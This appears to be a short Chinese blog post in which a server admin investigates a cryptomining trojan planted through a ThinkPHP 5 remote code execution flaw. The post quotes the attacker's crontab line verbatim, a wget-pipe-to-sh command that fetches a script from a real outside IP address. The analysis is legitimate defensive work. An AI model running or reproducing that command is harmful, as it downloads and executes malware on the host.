/tmp/php -s /tmp/p2.conf基本上可以確定是被掛馬了下一步確定來源
last 沒有登陸記錄先幹掉這幾個進程,但是幾分鐘之後又出現了#先看看這個木馬想幹什麼吧netstat 看到這個木馬開啟了一個連接埠和國外的某個ip建立了連接但是tcpdump了一小會兒沒有發現任何資料傳遞這他是想幹啥? 繼續查看日誌吧在cron日誌中發現了www用戶有一個crontab定時操作基本上就是這個問題了
wget -q -O - http://83.220.169.247/cr3.sh | sh > /dev/null 2>&1順著下載了幾個問題,看了看應該是個挖礦的木馬程式伺服器上的www用戶是安裝lnmp 創建的,看了來源很可能就是web漏洞了。 再看/tmp下的php的權限就是www的查看lnmp下幾個站的日誌 發現是利用thinkphp 5最近爆出的遠端程式碼執行漏洞漏洞細節:https://nosec.org/home/detail/2050.html修復問題解決但這個網站是測試網站 埠監聽的是8083 ,現在駭客能開始嗅探非常規端口了? 來源:https://www.simapple.com/425.html